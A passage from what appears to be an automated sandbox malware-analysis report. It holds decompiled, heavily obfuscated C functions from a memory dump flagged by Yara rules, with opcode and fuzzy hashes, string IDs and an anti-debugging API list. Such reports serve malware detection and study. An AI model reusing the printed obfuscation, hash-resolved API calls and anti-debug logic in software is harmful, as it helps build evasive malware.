				_v204 = _v204 | 0xf998f1bf;
				_v204 = _v204 ^ 0xf9be8168;
				_v164 = 0x3b6d58;
				_v164 = _v164 ^ 0xfbc1946a;
				_v164 = _v164 | 0xf113f9e6;
				_v164 = _v164 ^ 0xfbf9ede1;
				_v172 = 0xfed325;
				_v172 = _v172 ^ 0xf8019550;
				_v172 = _v172 ^ 0x5b4b4b1d;
				_v172 = _v172 ^ 0xa3befe51;
				_v196 = 0xbb5ff;
				_v196 = _v196 >> 9;
				_v196 = _v196 | 0xc4a93077;
				_t303 = 0x17;
				_v196 = _v196 * 0x45;
				_v196 = _v196 ^ 0x0196fdaa;
				_v156 = 0x8c85b8;
				_v156 = _v156 * 0x2b;
				_v156 = _v156 / _t303;
				_v156 = _v156 ^ 0x010b3f45;
				_v176 = 0x6b6a3d;
				_t51 =  &_v176; // 0x6b6a3d
				_t304 = 0x5b;
				_v176 =  *_t51 * 0x11;
				_v176 = _v176 >> 0xa;
				_v176 = _v176 ^ 0x0002f1d5;
				_v184 = 0xed332f;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x63d4c41d;
				_v184 = _v184 ^ 0xc6cebfb4;
				_v184 = _v184 ^ 0xa4c6275a;
				_v216 = 0xd9da9d;
				_v216 = _v216 / _t304;
				_v216 = _v216 | 0xfe4ffeff;
				_v216 = _v216 ^ 0xfe47cdfb;
				_v132 = 0x4c89ab;
				_v132 = _v132 | 0x8e16addf;
				_v132 = _v132 ^ 0x8e538111;
				_v208 = 0x321d72;
				_v208 = _v208 >> 2;
				_t305 = 0x2c;
				_v208 = _v208 * 0x23;
				_v208 = _v208 | 0xcdc94613;
				_v208 = _v208 ^ 0xcdff5cd9;
				_v152 = 0x2474c6;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x09159949;
				_v136 = 0x7ed832;
				_v136 = _v136 | 0xd6374e51;
				_v136 = _v136 ^ 0xd6756049;
				_v220 = 0x876b48;
				_v220 = _v220 + 0x5e6b;
				_v220 = _v220 << 3;
				_v220 = _v220 / _t305;
				_v220 = _v220 ^ 0x001eed09;
				_v200 = 0x23fe39;
				_t306 = 0x49;
				_v200 = _v200 / _t306;
				_v200 = _v200 + 0xffff2e11;
				_v200 = _v200 ^ 0xb5864ef7;
				_v200 = _v200 ^ 0x4a75c81d;
				_v192 = 0x3d150f;
				_t307 = 0x6a;
				_t315 = _v168;
				_t268 = _v168;
				_v192 = _v192 * 0x42;
				_v192 = _v192 / _t307;
				_t308 = 0x3c;
				_v192 = _v192 / _t308;
				_v192 = _v192 ^ 0x00064e10;
				_v148 = 0xcb5853;
				_t309 = 0x26;
				_v148 = _v148 / _t309;
				_v148 = _v148 ^ 0x0004e9ac;
				_v212 = 0xb5941e;
				_v212 = _v212 + 0x1842;
				_t310 = 0x5a;
				_t311 = _v168;
				_v212 = _v212 / _t310;
				_v212 = _v212 + 0xffffdacb;
				_v212 = _v212 ^ 0x0007c3f3;
				_v140 = 0xa68c6f;
				_v140 = _v140 | 0x83d01b36;
				_v140 = _v140 ^ 0x83f08dca;
				_v160 = 0xdc12f0;
				_v160 = _v160 << 5;
				_v160 = _v160 ^ 0x44094ed3;
				_v160 = _v160 ^ 0x5f840a03;
				_v180 = 0x5d0f5d;
				_v180 = _v180 >> 0xd;
				_v180 = _v180 + 0xffff8880;
				_v180 = _v180 >> 9;
				_v180 = _v180 ^ 0x00707445;
				_v188 = 0x7f5d3;
				_v188 = _v188 + 0x22f2;
				_v188 = _v188 >> 0x10;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x0008d1e0;
				while(1) {
					L1:
					_t249 = 0x6b77e87;
					do {
						while(_t312 != 0x3ca6ab2) {
							if(_t312 == 0x4fa9762) {
								_t312 = 0x3ca6ab2;
								continue;
							} else {
								if(_t312 == _t249) {
									_push(_v192);
									_push(_v200);
									_t255 = E001DCD35(0x1c166c, _v220, __eflags);
									_push(_t311);
									_push( &_v128);
									_push(_t255);
									_push(_t315);
									_push(_t268);
									 *((intOrPtr*)(E001C7DE3(_t273, 0xa92f64b6, 0x185)))();
									E001D629F(_v148, _t255, _v212, _v140, _v160);
									_t316 =  &(_t316[8]);
									_t312 = 0xbd056ba;
									goto L10;
								} else {
									if(_t312 == 0x8461c53) {
										_t315 = 0x4000;
										_push(_t269);
										_push(_t269);
										_t264 = E001D5212(0x4000);
										_t269 = _v168;
										_t268 = _t264;
										_t316 =  &(_t316[3]);
										__eflags = _t268;
										_t249 = 0x6b77e87;
										_t312 =  !=  ? 0x6b77e87 : 0xbd056ba;
										continue;
									} else {
										if(_t312 == 0xbd056ba) {
											E001CAE43(_t311, _v180, _v188);
										} else {
											if(_t312 != 0xc24c83e) {
												goto L15;
											} else {
												_t200 =  &_v184; // 0x707445
												_t311 = E001CBD61(_v156, _v176,  *((intOrPtr*)(_t269 + 4)),  *_t269,  *_t200, _v216);
												_t316 =  &(_t316[4]);
												if(_t311 != 0) {
													_t312 = 0x8461c53;
													L10:
													_t269 = _v168;
													goto L1;
												}
											}
										}
									}
								}
							}
							L18:
							return _t268;
						}
						__eflags = 1;
						_push(_t269);
						_t252 = E001C2C02(1, 0x10);
						_push(_v196);
						_t315 = _t252;
						_push( &_v128);
						_push(0xb);
						_push(_v172);
						E001C4A97(_t315, _v164);
						_t269 = _v168;
						_t316 =  &(_t316[6]);
						_t312 = 0xc24c83e;
						_t249 = 0x6b77e87;
						L15:
						__eflags = _t312 - 0x8c9e984;
					} while (__eflags != 0);
					goto L18;
				}
			}













































                          0x001ca3e7
                          0x001ca3e7
                          0x001ca3f1
                          0x001ca3f5
                          0x001ca404
                          0x001ca408
                          0x001ca40d
                          0x001ca415
                          0x001ca41d
                          0x001ca425
                          0x001ca42d
                          0x001ca435
                          0x001ca43d
                          0x001ca445
                          0x001ca44d
                          0x001ca455
                          0x001ca45d
                          0x001ca465
                          0x001ca46d
                          0x001ca475
                          0x001ca47d
                          0x001ca485
                          0x001ca48a
                          0x001ca499
                          0x001ca49c
                          0x001ca4a0
                          0x001ca4a8
                          0x001ca4b5
                          0x001ca4c1
                          0x001ca4c5
                          0x001ca4cd
                          0x001ca4d5
                          0x001ca4da
                          0x001ca4dd
                          0x001ca4e1
                          0x001ca4e6
                          0x001ca4ee
                          0x001ca4f6
                          0x001ca4fa
                          0x001ca502
                          0x001ca50a
                          0x001ca512
                          0x001ca522
                          0x001ca526
                          0x001ca52e
                          0x001ca536
                          0x001ca53e
                          0x001ca546
                          0x001ca54e
                          0x001ca556
                          0x001ca560
                          0x001ca561
                          0x001ca565
                          0x001ca56d
                          0x001ca575
                          0x001ca57d
                          0x001ca582
                          0x001ca58a
                          0x001ca592
                          0x001ca59a
                          0x001ca5a2
                          0x001ca5aa
                          0x001ca5b2
                          0x001ca5bd
                          0x001ca5c3
                          0x001ca5cb
                          0x001ca5d9
                          0x001ca5de
                          0x001ca5e4
                          0x001ca5ec
                          0x001ca5f4
                          0x001ca5fc
                          0x001ca609
                          0x001ca60c
                          0x001ca610
                          0x001ca614
                          0x001ca620
                          0x001ca628
                          0x001ca62d
                          0x001ca633
                          0x001ca63b
                          0x001ca647
                          0x001ca64c
                          0x001ca652
                          0x001ca65a
                          0x001ca662
                          0x001ca66e
                          0x001ca671
                          0x001ca675
                          0x001ca679
                          0x001ca681
                          0x001ca689
                          0x001ca691
                          0x001ca699
                          0x001ca6a1
                          0x001ca6a9
                          0x001ca6ae
                          0x001ca6b6
                          0x001ca6be
                          0x001ca6c6
                          0x001ca6cb
                          0x001ca6d3
                          0x001ca6d8
                          0x001ca6e0
                          0x001ca6e8
                          0x001ca6f0
                          0x001ca6f5
                          0x001ca6fa
                          0x001ca702
                          0x001ca702
                          0x001ca702
                          0x001ca707
                          0x001ca707
                          0x001ca719
                          0x001ca80c
                          0x00000000
                          0x001ca71f
                          0x001ca721
                          0x001ca7b3
                          0x001ca7bc
                          0x001ca7c4
                          0x001ca7cb
                          0x001ca7d7
                          0x001ca7d8
                          0x001ca7d9
                          0x001ca7da
                          0x001ca7e6
                          0x001ca7fa
                          0x001ca7ff
                          0x001ca802
                          0x00000000
                          0x001ca727
                          0x001ca72d
                          0x001ca77d
                          0x001ca78e
                          0x001ca78f
                          0x001ca791
                          0x001ca796
                          0x001ca79a
                          0x001ca79c
                          0x001ca7a4
                          0x001ca7a6
                          0x001ca7ab
                          0x00000000
                          0x001ca72f
                          0x001ca735
                          0x001ca86e
                          0x001ca73b
                          0x001ca741
                          0x00000000
                          0x001ca747
                          0x001ca74b
                          0x001ca761
                          0x001ca763
                          0x001ca768
                          0x001ca76e
                          0x001ca773
                          0x001ca773
                          0x00000000
                          0x001ca773
                          0x001ca768
                          0x001ca741
                          0x001ca735
                          0x001ca72d
                          0x001ca721
                          0x001ca877
                          0x001ca880
                          0x001ca880
                          0x001ca820
                          0x001ca821
                          0x001ca824
                          0x001ca829
                          0x001ca82d
                          0x001ca833
                          0x001ca834
                          0x001ca836
                          0x001ca840
                          0x001ca845
                          0x001ca849
                          0x001ca84c
                          0x001ca851
                          0x001ca856
                          0x001ca856
                          0x001ca856
                          0x00000000
                          0x001ca862

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: =jk$Etp$Xm;$\$k^
                          • API String ID: 0-1272230326
                          • Opcode ID: c5fe9b696ca0fb6d9cff1f712bed9f23bf961522dc6ae447c9ba8105595610ac
                          • Instruction ID: ee491a49f0be9a595870fa8aa5801eeab4c94ffd1d9868f58708aadeaf50d32b
                          • Opcode Fuzzy Hash: c5fe9b696ca0fb6d9cff1f712bed9f23bf961522dc6ae447c9ba8105595610ac
                          • Instruction Fuzzy Hash: DFC131715083809FD358CF69C48A91BFBE1FBD4358F508A2DF5A696260D3B9C94A8F43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C544C, Relevance: 6.5, Strings: 5, Instructions: 245COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E001C544C(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t244;
				void* _t263;
				intOrPtr _t271;
				void* _t273;
				intOrPtr* _t275;
				void* _t277;
				void* _t298;
				intOrPtr* _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				void* _t308;
				void* _t309;

				_t275 = _a12;
				_push(_t275);
				_push(_a8);
				_t300 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t244);
				_v36 = 0xdc2bcb;
				_t309 = _t308 + 0x14;
				_v36 = _v36 + 0x536c;
				_v36 = _v36 ^ 0x00dc7f36;
				_t298 = 0;
				_v88 = 0x1c73f3;
				_t277 = 0x150e76b;
				_t301 = 0x58;
				_v88 = _v88 / _t301;
				_v88 = _v88 | 0x7f753ffe;
				_v88 = _v88 ^ 0x7f757ffe;
				_v64 = 0x374fb2;
				_t302 = 0x4f;
				_v64 = _v64 / _t302;
				_v64 = _v64 + 0xadcb;
				_v64 = _v64 ^ 0x00016107;
				_v72 = 0x71f7ec;
				_v72 = _v72 >> 7;
				_v72 = _v72 << 2;
				_v72 = _v72 ^ 0x00038fbc;
				_v28 = 0x592ffc;
				_v28 = _v28 | 0x6bdc89c5;
				_v28 = _v28 ^ 0x6bddaffd;
				_v84 = 0x8a5820;
				_v84 = _v84 << 0xb;
				_t303 = 6;
				_v84 = _v84 * 0x6f;
				_v84 = _v84 >> 0xe;
				_v84 = _v84 ^ 0x000386bc;
				_v12 = 0xa9e741;
				_v12 = _v12 + 0x6f3b;
				_v12 = _v12 ^ 0x00aa567c;
				_v100 = 0x6c7d8d;
				_v100 = _v100 ^ 0x675748fb;
				_v100 = _v100 / _t303;
				_v100 = _v100 >> 9;
				_v100 = _v100 ^ 0x000219b4;
				_v60 = 0x2262da;
				_v60 = _v60 | 0x0807b7ac;
				_v60 = _v60 ^ 0x496315a5;
				_v60 = _v60 ^ 0x41454186;
				_v104 = 0xbed500;
				_v104 = _v104 + 0xde03;
				_v104 = _v104 + 0x2fdf;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000bb7de;
				_v32 = 0x715e1e;
				_v32 = _v32 | 0x73b11108;
				_v32 = _v32 ^ 0x73fcfaa1;
				_v68 = 0x83a372;
				_v68 = _v68 >> 4;
				_v68 = _v68 | 0xb7f01704;
				_v68 = _v68 ^ 0xb7f9ca93;
				_v108 = 0x4b5c53;
				_v108 = _v108 << 0xd;
				_v108 = _v108 + 0xbfd6;
				_v108 = _v108 | 0xd24a98ab;
				_v108 = _v108 ^ 0xfbcc634c;
				_v24 = 0xdad6c6;
				_t304 = 0x38;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x000d4cce;
				_v52 = 0xf34fea;
				_v52 = _v52 ^ 0x0965af87;
				_v52 = _v52 + 0xffffee3a;
				_v52 = _v52 ^ 0x0993a66a;
				_v56 = 0x5126e0;
				_v56 = _v56 << 4;
				_t305 = 0x24;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0xcd84b63b;
				_v96 = 0xa97a98;
				_v96 = _v96 >> 2;
				_v96 = _v96 ^ 0xfedf87fe;
				_v96 = _v96 ^ 0xf15aa456;
				_v96 = _v96 ^ 0x0fa410ba;
				_v16 = 0x301ef9;
				_v16 = _v16 / _t305;
				_v16 = _v16 ^ 0x000f2a66;
				_v80 = 0xba5fe3;
				_t306 = 0x4b;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 + 0xffff00e9;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x000b7def;
				_v20 = 0x56787d;
				_v20 = _v20 + 0xfffff4a0;
				_v20 = _v20 ^ 0x005a7884;
				_v44 = 0x1443f4;
				_v44 = _v44 / _t306;
				_v44 = _v44 + 0x5792;
				_v44 = _v44 ^ 0x000e9e3f;
				_v48 = 0x4a21a2;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x6683f774;
				_v48 = _v48 ^ 0x66830a3b;
				_v92 = 0x1b1e81;
				_v92 = _v92 ^ 0xc1b2560b;
				_v92 = _v92 + 0xbb04;
				_v92 = _v92 << 9;
				_v92 = _v92 ^ 0x5408c7e4;
				_v76 = 0x95c882;
				_v76 = _v76 << 0xf;
				_v76 = _v76 * 0x58;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x9606a67d;
				_v40 = 0x7abc9b;
				_v40 = _v40 ^ 0xf5a57a11;
				_v40 = _v40 | 0x139c0c13;
				_v40 = _v40 ^ 0xf7daa019;
				do {
					while(_t277 != 0x150e76b) {
						if(_t277 == 0x5cf5989) {
							_t263 = E001C62D2( &_v4, _v16, _v8, _v80, _v84, _v20, _v44, _v48, _t277,  *_t300, _v88, _v4, _t277,  *((intOrPtr*)(_t300 + 4)),  *((intOrPtr*)( *0x1e5220 + 0x44)), _v92);
							_t309 = _t309 + 0x38;
							if(_t263 == _v12) {
								 *_t275 = _v8;
								_t298 = 1;
								 *((intOrPtr*)(_t275 + 4)) = _v4;
							} else {
								_t277 = 0xb0e3219;
								continue;
							}
						} else {
							if(_t277 == 0x7dcf113) {
								_push(_t277);
								_push(_t277);
								_t271 = E001D5212(_v4);
								_t309 = _t309 + 0xc;
								_v8 = _t271;
								if(_t271 != 0) {
									_t277 = 0x5cf5989;
									continue;
								}
							} else {
								if(_t277 == 0x8685116) {
									_t273 = E001C62D2( &_v4, _v100, _t298, _v60, _v64, _v104, _v32, _v68, _t277,  *_t300, _v36, _v72, _t277,  *((intOrPtr*)(_t300 + 4)),  *((intOrPtr*)( *0x1e5220 + 0x44)), _v108);
									_t309 = _t309 + 0x38;
									if(_t273 == _v28) {
										_t277 = 0x7dcf113;
										continue;
									}
								} else {
									if(_t277 != 0xb0e3219) {
										goto L14;
									} else {
										E001CAE43(_v8, _v76, _v40);
									}
								}
							}
						}
						L17:
						return _t298;
					}
					_t277 = 0x8685116;
					L14:
				} while (_t277 != 0x9ca187e);
				goto L17;
			}














































                          0x001c5450
                          0x001c545a
                          0x001c545b
                          0x001c5462
                          0x001c5464
                          0x001c546b
                          0x001c546c
                          0x001c546d
                          0x001c5472
                          0x001c547a
                          0x001c547d
                          0x001c5487
                          0x001c548f
                          0x001c5491
                          0x001c5499
                          0x001c54a4
                          0x001c54a9
                          0x001c54af
                          0x001c54b7
                          0x001c54bf
                          0x001c54cb
                          0x001c54d0
                          0x001c54d6
                          0x001c54de
                          0x001c54e6
                          0x001c54ee
                          0x001c54f3
                          0x001c54f8
                          0x001c5500
                          0x001c5508
                          0x001c5510
                          0x001c5518
                          0x001c5520
                          0x001c552a
                          0x001c552b
                          0x001c552f
                          0x001c5534
                          0x001c553c
                          0x001c5544
                          0x001c554c
                          0x001c5554
                          0x001c555c
                          0x001c556a
                          0x001c556e
                          0x001c5573
                          0x001c557b
                          0x001c5583
                          0x001c558b
                          0x001c5593
                          0x001c559b
                          0x001c55a3
                          0x001c55ab
                          0x001c55b3
                          0x001c55b8
                          0x001c55c0
                          0x001c55c8
                          0x001c55d0
                          0x001c55d8
                          0x001c55e0
                          0x001c55e5
                          0x001c55ed
                          0x001c55f5
                          0x001c55fd
                          0x001c5602
                          0x001c560a
                          0x001c5614
                          0x001c561c
                          0x001c562a
                          0x001c562f
                          0x001c5635
                          0x001c563d
                          0x001c5645
                          0x001c564d
                          0x001c5655
                          0x001c565d
                          0x001c5665
                          0x001c566f
                          0x001c5672
                          0x001c5676
                          0x001c567e
                          0x001c5686
                          0x001c568b
                          0x001c5693
                          0x001c569b
                          0x001c56a3
                          0x001c56b3
                          0x001c56b7
                          0x001c56bf
                          0x001c56cc
                          0x001c56cd
                          0x001c56d1
                          0x001c56d9
                          0x001c56de
                          0x001c56e6
                          0x001c56ee
                          0x001c56f6
                          0x001c56fe
                          0x001c5711
                          0x001c5715
                          0x001c571d
                          0x001c5725
                          0x001c572d
                          0x001c5732
                          0x001c573a
                          0x001c5742
                          0x001c574a
                          0x001c5752
                          0x001c575a
                          0x001c575f
                          0x001c5767
                          0x001c576f
                          0x001c5779
                          0x001c577d
                          0x001c5782
                          0x001c578a
                          0x001c5792
                          0x001c579a
                          0x001c57a2
                          0x001c57aa
                          0x001c57aa
                          0x001c57b8
                          0x001c58cd
                          0x001c58d2
                          0x001c58d9
                          0x001c58fe
                          0x001c5900
                          0x001c5905
                          0x001c58db
                          0x001c58db
                          0x00000000
                          0x001c58db
                          0x001c57be
                          0x001c57c4
                          0x001c585f
                          0x001c5860
                          0x001c5868
                          0x001c586d
                          0x001c5870
                          0x001c5876
                          0x001c587c
                          0x00000000
                          0x001c587c
                          0x001c57ca
                          0x001c57d0
                          0x001c5833
                          0x001c5838
                          0x001c583f
                          0x001c5845
                          0x00000000
                          0x001c5845
                          0x001c57d2
                          0x001c57d8
                          0x00000000
                          0x001c57de
                          0x001c57ea
                          0x001c57ef
                          0x001c57d8
                          0x001c57d0
                          0x001c57c4
                          0x001c5908
                          0x001c5911
                          0x001c5911
                          0x001c58e5
                          0x001c58ea
                          0x001c58ea
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;o$S\K$lS$}xV$&Q
                          • API String ID: 0-2347710372
                          • Opcode ID: fd4839fc927fd988fc5a41728d88ad5b5bb198c6266f84f202986156fe62178a
                          • Instruction ID: 1a87b782a8e1006bb4cd606e6223b3970f58de1daa2dcd483da41a5e02810403
                          • Opcode Fuzzy Hash: fd4839fc927fd988fc5a41728d88ad5b5bb198c6266f84f202986156fe62178a
                          • Instruction Fuzzy Hash: 63C1FF711097809FC769CF62C94A91BBBF2BBE4B48F50891CF69586220D3B1D949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D28D5, Relevance: 6.5, Strings: 5, Instructions: 228COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '$b9$zw$@$i
                          • API String ID: 0-3000951012
                          • Opcode ID: 96455cd2016f212a3429d5c1fa8e9b5f30aaae352fd8f99f4d57394f3f79516a
                          • Instruction ID: e4614fdbee1ec285980ef64384dec8bc6b9267f5562fff0cb7c9febfbe6ae9aa
                          • Opcode Fuzzy Hash: 96455cd2016f212a3429d5c1fa8e9b5f30aaae352fd8f99f4d57394f3f79516a
                          • Instruction Fuzzy Hash: A3A146715093009FC714CF26C989A5FBBE2EBD5B58F04891EF1959A260C3B5CA0ACF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D52D1, Relevance: 6.5, Strings: 5, Instructions: 201COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,Z$,Z$Do$oHg$}bH
                          • API String ID: 0-2022688335
                          • Opcode ID: dc379d8c1edf4968568af81422dba4a05901ce7f6388af5f6af72bd4dafe489f
                          • Instruction ID: 0c8ab976c30cb8bb803a7f2045c793eea5a554750832fdce6214213bf3df479f
                          • Opcode Fuzzy Hash: dc379d8c1edf4968568af81422dba4a05901ce7f6388af5f6af72bd4dafe489f
                          • Instruction Fuzzy Hash: B58186712183009BD758CE25D48941FBBF2FBD8798F508A2EF59696260C7B2C949CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C8D80, Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +Jn?$1p$HkRx$JW$oRz
                          • API String ID: 0-927109725
                          • Opcode ID: 734940a0da3959c99c4ff093312b85d044176cf5f14e025e03517a7b59add86a
                          • Instruction ID: bd41d770a7a7d94c3041f96f89f0f420b94f4fe5faa3fa66d6e427e05e712af2
                          • Opcode Fuzzy Hash: 734940a0da3959c99c4ff093312b85d044176cf5f14e025e03517a7b59add86a
                          • Instruction Fuzzy Hash: 5A6144725083019FC358CE21C48985FBBF2FBD4368F548A1DF59566260D7B4DA4ACF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BAB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E4BAB18
                          • IsDebuggerPresent.KERNEL32 ref: 6E4BABE4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4BAC04
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6E4BAC0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 85dca97e5537c9384d5b4a6050391313495e17c0e3703eab9bf32ca10de780fb
                          • Instruction ID: 4e05cf6d285d3b36aabc77fd75477dfe7678a8f27c98d695a6e02a5539bc0dc0
                          • Opcode Fuzzy Hash: 85dca97e5537c9384d5b4a6050391313495e17c0e3703eab9bf32ca10de780fb
                          • Instruction Fuzzy Hash: B5311675D0531C9BDF50DFA4D989BCDBBB8AF08708F1044AAE50DAB240EB709A84DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CEE60, Relevance: 5.4, Strings: 4, Instructions: 354COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #,BW$,)$Iv5$TaF_
                          • API String ID: 0-3950248132
                          • Opcode ID: 77f2f4fa55329ae4b0dbfad4e7c0db6eab7cc13f1080655284ecea2c41643245
                          • Instruction ID: dd67766c1e8908bd0212fec713b7e580087f231925f3830a087762760040f3f6
                          • Opcode Fuzzy Hash: 77f2f4fa55329ae4b0dbfad4e7c0db6eab7cc13f1080655284ecea2c41643245
                          • Instruction Fuzzy Hash: 80023471C0031C9BCF28CFA5D94AADEBBB2FB54314F20815DE116BA260D7B44A8ACF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C6453, Relevance: 5.2, Strings: 4, Instructions: 220COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: JS$Q+L$_+M$k%|
                          • API String ID: 0-1651988620
                          • Opcode ID: ceb267fd2ebd44106289bfd2a23178b3059612b5fc88a7ea45f8895f0ce870ac
                          • Instruction ID: 1c3b403576e213585d9d5241551bfe4689276ccbe4f2b3af0d843a0dfb3bdf40
                          • Opcode Fuzzy Hash: ceb267fd2ebd44106289bfd2a23178b3059612b5fc88a7ea45f8895f0ce870ac
                          • Instruction Fuzzy Hash: 93A10F715083819FC358CF66C48991BFBE2FBA4758F10891DF69696260D3B5CA498F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C2CC2, Relevance: 5.2, Strings: 4, Instructions: 219COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !y$Zc5$5v$xe
                          • API String ID: 0-3224497632
                          • Opcode ID: b09f5cd0d864857308b96e52e71b07b7ab590047c35713b6a52464874615d622
                          • Instruction ID: 4c1a847466adc7a72956333cbac7aa49ee5877223d44d72794500cf4e58341aa
                          • Opcode Fuzzy Hash: b09f5cd0d864857308b96e52e71b07b7ab590047c35713b6a52464874615d622
                          • Instruction Fuzzy Hash: 25A11E765083819FC358CF69C48981BFBF0BBD4758F108A2CF9A596220D3B5DA49CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D3D0C, Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: FPTh$Z{{$[ob>$e(
                          • API String ID: 0-1695153795
                          • Opcode ID: 8cdc462bef4edb839e6f7278958481a92f4dfb6d14644f6973e29e16c9843bc3
                          • Instruction ID: 018ce125b7b0b55ba81683c0344e4e5d182c271721e2e935ef31ddb7334da14b
                          • Opcode Fuzzy Hash: 8cdc462bef4edb839e6f7278958481a92f4dfb6d14644f6973e29e16c9843bc3
                          • Instruction Fuzzy Hash: 76A116728083459BC758CF69C58585FFBE1BBC4748F404A2EF99996220D3B1DA49CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CBD61, Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &J$M0}M$t$n
                          • API String ID: 0-2598164408
                          • Opcode ID: 93112c13898719dcb0fa725f487b000004003678a4712dd1a04254958555576a
                          • Instruction ID: da9f843d5b7c083b74a0d800f0502e3d59d12ac28b89654d9d20a2c23ec67d01
                          • Opcode Fuzzy Hash: 93112c13898719dcb0fa725f487b000004003678a4712dd1a04254958555576a
                          • Instruction Fuzzy Hash: 759122715083809BD354CEA5C54AA1BFBF1FBE8758F508A1DF69686260C3B6C949CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C43BE, Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,?Z$,P$x&z$z\
                          • API String ID: 0-1410888773
                          • Opcode ID: 17635d5d9c2ea99e6c8d47affebd6329b62548ec35397c7043d11d3fed521b3e
                          • Instruction ID: 325ebb57716f8fe47fc3f392d3512a937469eb430a78116a65d9697cfa6bc418
